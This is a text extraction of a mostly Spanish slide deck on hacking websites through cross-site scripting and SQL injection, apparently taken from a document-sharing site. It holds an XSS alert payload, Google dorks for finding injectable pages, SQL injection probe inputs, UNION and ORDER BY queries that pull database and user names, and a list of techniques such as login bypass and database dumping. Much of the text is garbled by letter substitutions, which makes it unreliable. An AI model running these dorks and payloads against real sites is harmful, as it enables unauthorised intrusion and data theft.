| Date post: | 17-Feb-2018 |
| Category: |
Documents |
| Upload: | alex-chambi |
| View: | 224 times |
| Download: | 0 times |
of 23
7/23/2019 x Sss Ql Injection
1/23
Hacking Webl
Cross Site Scripting and SQLInjection
7/23/2019 x Sss Ql Injection
2/23
About me:
7/23/2019 x Sss Ql Injection
3/23
l Desarrollo del curso:l
Teorial Riesgos
l Conocimientos preiosl Como !uncional Algunos ata"uesl #jemplosl $ectores de ata"uel %&pass WA'l Dorks
7/23/2019 x Sss Ql Injection
4/23
Cross Site Scripting()SS*
A+D
SQLInjection
7/23/2019 x Sss Ql Injection
5/23
l ,script-alert(.*/,0script-
7/23/2019 x Sss Ql Injection
6/23
l D1R2S
l inurl:searc34p3p5l inurl:!ind4p3p5l inurl:searc343tmll
inurl:!ind43tmll inurl:searc34asp6l inurl:!ind4asp6
7/23/2019 x Sss Ql Injection
7/23
l DATA%AS#l D% serers7l 8&SQL(1pen source*7
l 8SSQL7l 8S9ACC#SS7l 1racle7l ostgre SQL(open source*7
l SQLitel SQLl Structured Quer& Language is 2no;n as SQL4 In
order to communicate ;it3 t3e Database 4 We
are "uer&ing t3e database so it is called asQuer& language4
7/23/2019 x Sss Ql Injection
8/23
W3at is SQL Injection5
l In&eccin & !amosos
de la pirater?a en la actualidad4 Algunos noatos
est@n pensando "ue esto es una cosa pe"uea
debido a alg>nos tipos de so!t;are con gui
7/23/2019 x Sss Ql Injection
9/23
#jemplo de una base de datos
CONSULTAS BASICAS
select * from table 1
select column1,column2 from table1
-------------------------------------------------------
CONDICIONES BASICAS A!ALI"TIA! LA SALIDA
Select * from stu#ents $%ere '1
Select * from stu#ents $%ere
f(name')camal&ne)
7/23/2019 x Sss Ql Injection
10/23
l S& la consulta esta toman#o aluna entra#a numer&cal select !rom tablename ;3ere idE.l select !rom tablename ;3ere idEF.Fl select !rom tablename ;3ere idEB.Bl select !rom tablename ;3ere idE(.*l select !rom tablename ;3ere idE(F.F*l select !rom tablename ;3ere idE(B.B*l S& la consulta esta toman#o auna entra#a t&+o str&nl select !rom tablename ;3ere idEF.Fl select !rom tablename ;3ere idEB.Bl select !rom tablename ;3ere idE(F.F*l select !rom tablename ;3ere idE(B.B*
7/23/2019 x Sss Ql Injection
11/23
3ttp:00page;eb4com0report4p3p5idEG
l select !rom tablename ;3ere idEGl select !rom tablename ;3ere idEFGFl select !rom tablename ;3ere idEBGBl select !rom tablename ;3ere idE(G*l select !rom tablename ;3ere idE(FGF*l
select !rom tablename ;3ere idE(BGB*
l A+T#S D# C18R1$AR #L TI1 D#
C1+SLTA Q# S# #STA HACI#+D14
l 99 : 8&SQL Linu6 St&lel 99J : 8&SQL Windo;s St&lel
K : Has3 (RL encode ;3ile use*l 99J9
7/23/2019 x Sss Ql Injection
12/23
select !rom tablename ;3ere idEG
l
Input Reaction i! its Intiger %ased Injectionl GF: It s3ould cause error or no outputl B : S3ould cause error or no outputl G or .E. : An& 1utput s3ould come but ma& be
di!!erent outputl G and .E. : Same output s3ould comel G and !alse: +o outputl G and true : Same 1utputl G99J : Same output4 I used 99J to comment7 later i ll s3o;
3o; to kno; ;3ic3 one to usel G and true99J : Same output
7/23/2019 x Sss Ql Injection
13/23
select !rom tablename ;3ere
idEFGFl Input Reaction i! its Single Qoute %ased
Injectionl GF : It s3ould cause error or no outputl
GB : +o error Same outputl GF or F.FEF. : An& 1utput s3ould come but ma&
be di!!erent outputl GF and F.FEF. : Same output s3ould comel GF and !alse99J : +o outputl GF and true99J : Same 1utput
7/23/2019 x Sss Ql Injection
14/23
select !rom tablename ;3ere
idEBGBl Input Reaction i! its Double Qoute %ased
Injectionl GF : +o error Same outputl
GB : -It s3ould cause error or no outputl GB or B.BEB. : An& 1utput s3ould come but
ma& be di!!erent outputl GB and B.BEB. : Same output s3ould comel GB and !alse99J : +o outputl GB and true99J: Same 1utput
7/23/2019 x Sss Ql Injection
15/23
select !rom tablename ;3ere idE(G*
l
Input Reaction i! its Intiger %ased %racketenclosed Injectionl GF : It s3ould cause error or no outputl B : S3ould cause error or no output
l G or .E. : 1utput s3ould come but ma& bedi!!erent output
l G and .E. : 1utput s3ould come but ma& be
di!!erent outputl G and !alse : +o outputl G and true : Same 1utputl G99J : #rror or +o output4 Here &ou can
understand t3at an& %racket is usedl 99
7/23/2019 x Sss Ql Injection
16/23
select !rom tablename ;3ere
idE(FGF*l Input Reaction i! its bracket enclosed Single
Quote based Injectionl GF : It s3ould cause error or no outputl
GB : +o error Same outputl GF or F.FEF. : An& 1utput s3ould come but ma&
be di!!erent outputl GF and F.FEF. : An& 1utput s3ould come but
ma& be di!!erent outputl GF and !alse99J : +o output or errorl GF and true99J : +o output or errorl GF* and 'alse99J : +o outputl GF and true99J : Same 1ut ut
7/23/2019 x Sss Ql Injection
17/23
select !rom tablename ;3ere idE(BGB*
l Input Reaction i! its bracket enclosed Double
Quote based Injectionl GF : +o error Same outputl
GB : #rror or +o outputl GB or B.BEB. : An& 1utput s3ould come but
ma& be di!!erent outputl GB and B.BEB. : An& 1utput s3ould come but
ma& be di!!erent outputl GB and !alse99J : +o output or errorl GB and true99J: +o output or errorl GB* and 'alse99J : +o outputl GB and true99J : Same 1ut ut
7/23/2019 x Sss Ql Injection
18/23
TR#S R#OLAS %ASICAS D# I+P#CI1+
l .4 %alance4l G4 Inject4l 4 Commenting4
Select !rom tablename ;3ere idEF,input-F
B3ttp:00!akesite4com0report4p3p5idEGF order b& .99JB
#ntonces in&ectaremos en el lugar de ,input-
Select !rom tablename ;3ere idEFGF order b& .99JF
C1 1 1 Q SC 1
7/23/2019 x Sss Ql Injection
19/23
C181 P 1R Q# %SCAR #L +8#R1 D#
C1L8+ASl Select !name7lname !rom
students ;3ere idE.l #eclarac&on UNIONl Select !name7lname !rom
students ;3ere idE. union
select !name7lname !rom
students ;3ere idEG
7/23/2019 x Sss Ql Injection
20/23
l Select f(name,l(name from stu#ents $%ere '1
un&on select 1,2l !name lnamel #mil& ;atsonl . Gl Select f(name,l(name from stu#ents $%ere '1
un&on select )%ello),)be)l
!name lnamel #mil& ;atsonl 3ello b&el Select f(name,l(name from stu#ents $%ere '1
un&on select #atabase.,user.l !name lnamel #mil& ;atsonl !akedb. !akeuserlocal3ostl
Select * from stu#ents $%ere '1 un&on selectf name l name from stu#ents $%ere '2
7/23/2019 x Sss Ql Injection
21/23
1RD#R %Pl uer Out+utl select !rom students order b& . : It ;ill outputall t3e ro;s and sort t3en b& t3e !irst column
;3ic3 is idl select !rom students order b& G : It ;ill output
all t3e ro;s and sort t3en b& t3e second column
;3ic3 is !namel select !rom students order b& : It ;ill output
all t3e ro;s and sort t3en b& t3e t3ird column;3ic3 is lname
l select !rom students order b& : It ;ill output
all t3e ro;s and sort t3en b& t3e !ort3 column
;3ic3 is rollno
)ATH # % d I j ti # t t l
7/23/2019 x Sss Ql Injection
22/23
)ATH9#rror9%ased9Injection9#6tractalue
)ATH9#rror9%ased9Injection9pdate)8L
#rror9%ased9Injection9Sub"uer&9Injection
%lind9SQL9Injection
b&pass9login9using9s"l9injection
Dump9database9!rom9login9!orm9s"l
time9based9blind9injection
insert9"uer&9injection
group9b&9and9order9b&9s"l9injectionnion9based91racle9Injection
7/23/2019 x Sss Ql Injection
23/23
Dorks
l inurl:inde64p3p5idEl inurl:galler&4p3p5idEl inurl:article4p3p5idEl
inurl:pageidE
